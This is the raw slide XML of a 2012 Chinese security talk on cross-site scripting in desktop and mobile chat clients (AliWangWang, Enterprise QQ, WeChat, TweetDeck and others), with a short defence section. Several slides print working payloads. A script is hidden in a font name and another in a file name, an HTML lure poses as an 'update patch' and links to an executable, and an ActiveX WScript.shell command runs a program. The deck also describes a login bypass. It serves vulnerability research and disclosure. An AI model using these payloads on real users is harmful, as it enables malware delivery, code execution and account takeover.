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944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1293350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mailto:evi1m0.bat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hackersoul.com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evi1m0.sinaapp.com/down.png'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id.b.qq.com/hrtx/clientcall/clientInfo/newAllInOne?objective_qquin=2333350888&amp;orignal_qquin=123230273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www.xiami.com/accounts/pcsuccess?user_id=12345678&amp;type=XMa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去年跨过的客户端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54737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 defTabSz="403097">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="2898"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" defTabSz="403097">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3795">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>evi1m0.bat@gmail.com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阿里旺旺客户端XSS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73801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>一、概述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能显示表情图片成了现在的聊天软件必备基本功能，这就需要支持展示富文本的控件。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聊天软件主要用到两种富文本格式：RTF和HTML格式，RTF可以采用RichEdit、HTML可以选择浏览器内核，比如Windows自带的IE内核。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阿里旺旺用的就是IE内核作为聊天内容展示区，QQ使用的则是RichEdit，用浏览器内核作为展示的聊天软件，可能就存在被注入JS的风险。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Shape 62"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="18034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Date: 2012/01/29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Shape 63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="136525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zswang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阿里旺旺客户端XSS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73801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="3900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3348" b="1"/>
              <a:t>二、测试</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="2900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2604"/>
              <a:t>操作系统会提供当前已经安装的字体列表，比如：宋体、黑体、Verdana等等。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="2900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2604"/>
              <a:t>这些字体名一般不会出现特殊符号，但通过修改内存、跨进程控制控件的方式可以修改字体名，根据规则：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="2900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2604"/>
              <a:t>append("&lt;font name=" + fontname + "&gt;" + htmlencode(context) + “&lt;/font&gt;")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="2900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2604"/>
              <a:t>可以添加一个字体名为：&gt;&lt;script&gt;alert('hello');&lt;/script  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="543305">
              <a:spcBef>
                <a:spcPts val="2900"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2604"/>
              <a:t>解析后：&lt;font name=&gt;&lt;script&gt;alert('hello');&lt;/script&gt;context2&lt;/font&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Shape 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="18034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Date: 2012/01/29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Shape 68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="136525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zswang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阿里旺旺客户端XSS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933449" y="2813049"/>
            <a:ext cx="5372101" cy="4724402"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600" b="1"/>
              <a:t>三、结果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构造Payload保存字体后发送消息，接收方打开恶意网址进行软件下载安装，实施攻击。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:endParaRPr sz="2800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Shape 72"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="18034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Date: 2012/01/29</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Shape 73"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9626600" y="136525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zswang</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="74" name="aliwangwang客户端xss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9250" y="3075225"/>
            <a:ext cx="5372101" cy="5330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腾讯客户端XSS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Windows企业QQ最新版上线设置对外名片展示功能</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>QQ头像mini资料展示好友名片，触发XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>多字段（称呼、职位）绕过长度限制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="Shape 78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79" name="271c7265e6bb47b7e404cb1b7da4b14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2886025"/>
            <a:ext cx="4876800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8460b0fc68796a5a4b041009acc2d99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8300" y="5060850"/>
            <a:ext cx="5334000" cy="374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ICQ客户端XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Shape 83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84" name="icq20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3590" y="3790841"/>
            <a:ext cx="5517620" cy="3899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微信红包XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Shape 87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88" name="weixinhongbao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188" y="2898932"/>
            <a:ext cx="3788624" cy="568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weixinhongbao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1825" y="2898932"/>
            <a:ext cx="4946950" cy="5682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Twitter客户端TweetDeck XSS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952500" y="2251496"/>
            <a:ext cx="5334000" cy="525060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当Tweet中插入了Unicode字符“♥”，Twitter会将其自动转换为心形的图案，并导致HTML过滤器失效，在TweetDeck中触发XSS。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Shape 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="96139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*andy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="94" name="twitter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5400" y="6872839"/>
            <a:ext cx="7514000" cy="157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twitter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7793" y="2931786"/>
            <a:ext cx="5795014" cy="357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新浪微博IOS客户端XSS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WEB发表</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>IOS客户端未过滤触发跨站漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Shape 99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路人甲</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="100" name="weiboiosxs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5820" y="3065031"/>
            <a:ext cx="3998959" cy="5998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不同平台下的客户端“特性”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103" name="apple-vs-android-vs-windows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2323" y="3566715"/>
            <a:ext cx="6940063" cy="462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Windows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99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用户基数量大</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>调用WEB接口较多</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>功能繁多，接口复杂</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>研发团队投入力度大，安全性相对较高</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="107" name="windows_8_metro_logo_by_bruellkaefer-d3i37gz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533400"/>
            <a:ext cx="1981200" cy="198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ID: Evi1m0</a:t>
            </a:r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邪红色信息安全组织创始人，知道创宇安全研究员</a:t>
            </a:r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weibo: @evi1m0</a:t>
            </a:r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http://zhuanlan.zhihu.com/evi1m0</a:t>
            </a:r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site: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://www.hackersoul.com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 OS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99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极简主义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>调用WEB接口少</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>对用户输入过滤相对不够严谨</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>用户基数量相对于Windows较少</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="111" name="Apple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225" y="720725"/>
            <a:ext cx="1606550" cy="160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IOS &amp; Android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73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调用WEB接口多</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>WEB接口输入过滤相对不严谨</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>两者移植性差，安全问题易被忽略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1270000" y="4207827"/>
            <a:ext cx="10464800" cy="80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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500"/>
              <a:t>案例与利用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混合通信所导致的安全隐患</a:t>
            </a:r>
          </a:p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WSL Tip 1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952499" y="2774950"/>
            <a:ext cx="5334001" cy="5930900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="345722" indent="-345722"/>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>不同平台对文件名采取的命名规则不同，导致客户端在通信时存在某些安全隐患。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="120" name="26soul.xlarge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135" y="4588220"/>
            <a:ext cx="3950331" cy="230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环境：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MacOS 阿里旺旺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Windows阿里旺旺</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Shape 124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5565230" cy="618068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修改文件名为Payload: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&lt;iframe onload=eval(String.fromCharCode(97,108,101,114,116,40,108,111,99,97,116,105,111,110,41,59))&gt;.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 128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129" name="aliwangwangxss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1094" y="5410200"/>
            <a:ext cx="5565230" cy="228736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30" name="D1452CF8-BC80-49AF-894E-F0D87E9FEDCC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4408" y="3048000"/>
            <a:ext cx="3810001" cy="191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5565230" cy="618068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Mac OS阿里旺旺发送构造好文件名后的文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Win客户端触发跨站</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="134" name="Shape 134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135" name="aliwangwangxss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6183" y="3205371"/>
            <a:ext cx="5025341" cy="1907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aliwangwangxss4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9653" y="5471467"/>
            <a:ext cx="4978401" cy="242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混合通信所导致的安全隐患</a:t>
            </a:r>
          </a:p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WSL Tip 2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952499" y="2774950"/>
            <a:ext cx="5334001" cy="5930900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="345722" indent="-345722"/>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>Windows/Unix/Other平台客户端的非WEB接口输入数据在其他平台上可能会作为WEB接口的数据进行输出。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="140" name="26soul.xlarge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135" y="4588220"/>
            <a:ext cx="3950331" cy="230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/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>Windows版本阿⾥里旺旺对群成员进⾏行给予管理员/撤销管理员时会发送一条信息提醒, 在Win版本下直接输出,但在阿⾥里旺旺 for Mac版本上会本地域加载消息提醒。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144" name="Shape 144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抓取控件句柄做一个hook，绕过阿里旺旺群名片长度限制，修改阿里旺旺群名片为攻击代码。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148" name="Shape 148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WHY?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>历史上的案例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>不同平台下的客户端“特性”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>WSL Tips案例</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>防御策略</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>总结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51" name="Shape 151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pic>
        <p:nvPicPr>
          <p:cNvPr id="152" name="阿里旺旺客户端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316" y="3154624"/>
            <a:ext cx="9292168" cy="6358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构造引诱下载后门的Payload：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&lt;div style='height:300px'&gt;&lt;/div&gt;&lt;span style='font-size:20px'&gt;&lt;b&gt;阿里旺旺&lt;/b&gt;更新补丁&lt;/span&gt;&lt;a href=‘http://www.hackersoul.com/demo.exe‘/&gt;&lt;img src='</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600" u="sng">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://evi1m0.sinaapp.com/down.png'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>&gt;&lt;/a&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156" name="Shape 156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59" name="Shape 159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5419725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Windows版本阿里旺旺对群成员进行职务操作时，会有消息提醒功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="161" name="阿里旺旺客户端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5865" y="3823975"/>
            <a:ext cx="5652085" cy="385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64" name="Shape 164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5419725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Mac OS版本阿里旺旺则会直接解析执行代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="166" name="阿里旺旺客户端-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1955" y="3766670"/>
            <a:ext cx="5245160" cy="3972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169" name="Shape 169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嵌入iframe标签弹出浏览器进行下载：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&lt;script&gt;window.open (‘http://www.hackersoul.com/demo.exe','newwindow','height=1000,width=1000,top=0,left=0,toolbar=no,menubar=no,scrollbars=no, resizable=no,location=no, status=no’);&lt;/script&gt;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Tips案例2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="Shape 173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5419725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Mac OS版本的企业QQ联系方式处未过滤长度限制和特殊字符</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="175" name="0065D2B7-5936-47D1-926E-64D5A7EFFC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4155" y="3551322"/>
            <a:ext cx="5551149" cy="4403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Tips案例2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="Shape 178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600" b="1"/>
              <a:t>一、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>QQ 发起会话时会访问用户名片,发起 http 请求,如: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://id.b.qq.com/hrtx/clientcall/clientInfo/newAllInOne?objective_qquin=2333350888&amp;orignal_qquin=123230273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Tips案例2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Shape 182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600" b="1"/>
              <a:t>二、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>QQ 客户端把这个 http 请求页面保存到本地 html 文件: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C:\Users\AppData\Roaming\Tencent\QQ\Misc\com.tencent. hrtx\HRTXSideBarFrame_2355350877.html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Tips案例2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="186" name="Shape 186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877515" y="3168650"/>
            <a:ext cx="11249770" cy="1752104"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="572516">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3528" b="1"/>
              <a:t>三、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3528"/>
              <a:t>QQ 客户端直接调用 file://协议运行这个 html 文件。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="188" name="3B9C433E-1CB6-430E-B1D7-8276F8EF02C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1949" y="4332795"/>
            <a:ext cx="8760902" cy="4009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Tips案例2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Shape 191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839415" y="3181350"/>
            <a:ext cx="11325969" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2628" b="1"/>
              <a:t>四、</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2628"/>
              <a:t>使用系统控件执行系统命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="426466">
              <a:spcBef>
                <a:spcPts val="3000"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2628"/>
              <a:t>&lt;script&gt;new ActiveXObject("WScript.shell").Run('calc.exe',1,true);&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="193" name="BB6118E7-A920-4990-9BA9-C45832CFD69E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2861" y="4848944"/>
            <a:ext cx="5259079" cy="4450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270000" y="4207827"/>
            <a:ext cx="10464800" cy="80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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500"/>
              <a:t>一切输入都是有害的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混合通信所导致的安全隐患</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="5500" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WSL Tip 3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927099" y="2774949"/>
            <a:ext cx="6578601" cy="5930901"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="345722" indent="-345722"/>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>不同平台下的客户端接口策略存在差异。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="197" name="26soul.xlarge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135" y="4588220"/>
            <a:ext cx="3950331" cy="230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虾米音乐登录成功后会跳转：</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3600">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://www.xiami.com/accounts/pcsuccess?user_id=12345678&amp;type=XMac</a:t>
            </a:r>
            <a:endParaRPr sz="3600"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>尝试修改user_id为其他用户id后未能登录成功</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>但虾米音乐Mac客户端则会获取标识type=XMac登录标识，未做判断将修改后的URL标识进行登录，导致可登录任意用户</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="201" name="Shape 201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Pw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WSL Tips案例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="204" name="51B20EAE-C74D-4AA2-837F-3928A469B38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6784" y="2925160"/>
            <a:ext cx="9051232" cy="6837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xfrm>
            <a:off x="952500" y="1993900"/>
            <a:ext cx="11099800" cy="5765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600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="6200" b="1"/>
              <a:t>···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防御策略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952500" y="2819400"/>
            <a:ext cx="11099800" cy="5765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600"/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多边界数据处理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跨平台开发沟通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完整的安全框架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xfrm>
            <a:off x="952500" y="2819400"/>
            <a:ext cx="11099800" cy="5765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600"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr">
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>攻防是个永久的话题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End.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为什么是客户端？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2500"/>
              <a:t>安全研究人员更多的把跨站的漏洞挖掘放在网站上，其实客户端也是可以的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="3600"/>
              <a:t>此处“跨”的含义</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="493888" lvl="0" indent="-493888">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>传统的跨站脚本攻击（XSS）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="493888" lvl="0" indent="-493888">
              <a:spcBef>
                <a:spcPts val="3200"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800"/>
              <a:t>跨平台客户端的安全隐患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同源策略（SOP）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952499" y="2070100"/>
            <a:ext cx="11099801" cy="687084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800" b="1"/>
              <a:t>浏览器安全核心基础：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同源策略（Same-Origin Policy）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http://www.w3.org/Security/wiki/Same_Origin_Policy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源(origin)指使用域名、协议、端口。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="47" name="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6659" y="3537694"/>
            <a:ext cx="3545307" cy="1208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5006" y="7290961"/>
            <a:ext cx="8314788" cy="2462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HTTP域 / File域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952500" y="2235353"/>
            <a:ext cx="11099800" cy="6273801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
